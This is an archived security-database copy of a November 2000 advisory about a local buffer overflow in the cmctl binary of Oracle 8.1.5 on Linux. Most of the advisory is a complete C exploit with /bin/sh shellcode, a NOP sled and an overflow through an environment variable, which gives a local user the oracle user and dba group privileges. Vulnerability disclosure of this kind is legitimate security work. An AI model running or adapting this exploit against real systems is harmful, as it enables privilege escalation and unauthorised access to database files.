Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:951
HistoryNov 20, 2000 - 12:00 a.m.

vulnerability in Connection Manager Control binary in Oracle 8.1.5 Linux Platform.

2000-11-2000:00:00
vulners.com
7
JSON

Hello Elias

    Colud you make public this advisory. Oracle people dont send an

answer in 6 days. Please cut this lines.

                                                            Thanks




                  WWW.PLAZASITE.COM
              System & Security Division

Title: Vulnerability in cmctl in Oracle 8.1.5
Date: 13-11-2000
Platform: Only tested in Linux, but can be exported to others.
Impact: Any user gain euid=oracle & egid=dba.
Author: Juan Manuel Pascual ([email protected])
Status: Vendor Contacted. Details Below

OVERVIEW:

cmctl is a Connection Manager Control binary

PROBLEM SUMMARY:

There is a buffer overflow in cmctl that can be use by local

users to obtain euid of oracle user and egid to dba. With the default
instalation oracle user owns all database files.

IMPACT:

Any user with local access, can gain euid= oracle an egid=dba

SOLUTION:

Maybe a chmod -s ;-)))).

STATUS:

Vendor was contacted 13/1.1 No answers were received in last

4 days.

This vulnerability was researched by:
Juan Manuel Pascual Escriba [email protected]

/*
Exploit Code for cmctl in Oracle 8.1.5 (8i) for Linux. I tested in RH
6.2
and 6.1. Is possible to export to others platforms.

If someone exports this to Sparc please tell me.

synopsis: buffer overflow in cmctl
Impact: any user gain euid=oracle and egid=dba.

Dedicated to cmlc guys: juaroflin, oscar, ismak, blas, blackbas and
others.
Thanks for your patience and time.

Special Thanks to my favourite DBA. Xavi "de verdad como sois" Morales.
*/

#include <stdio.h>
#include <stdlib.h>

#define DEFAULT_OFFSET 1
#define DEFAULT_BUFFER_SIZE 350
#define NOP 0x90
#define BINARY "/usr/local/oracle8i/app/oracle/product/8.1.5/bin/cmctl
echo $pakito"

char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void) {
asm("movl %esp,%eax");
}

main(int argc, char *argv[]) {
char *buff, *ptr,*name[3],environ[100],binary[120];
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i;

if (argc > 1) offset = atoi(argv[1]);
else
{
printf("Use ./cmctl_start Offset\n");
exit(1);
}

buff = malloc(bsize);
addr = get_sp() - offset;
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;

for (i = 0; i < bsize/2; i++)
buff[i] = NOP;

ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];

buff[bsize - 1] = '\0';
setenv("pakito",buff,1);

system(BINARY);
}

            &quot; In God We trust, Others We monitor &quot;

    -------------------------------------------------------------
     Juan Manuel Pascual Escribб        Administrador de Sistemas
     PlazaSite S.A.                         c/ Tomбs Bretуn 32-38
     08950 Esplugues de Llobregat           &#40;Barcelona&#41;,    SPAIN
     Ph: +34 93 3717398                       Fax: +34 93 3711968
     mob: 667591142                     Email: [email protected]
    -------------------------------------------------------------
JSON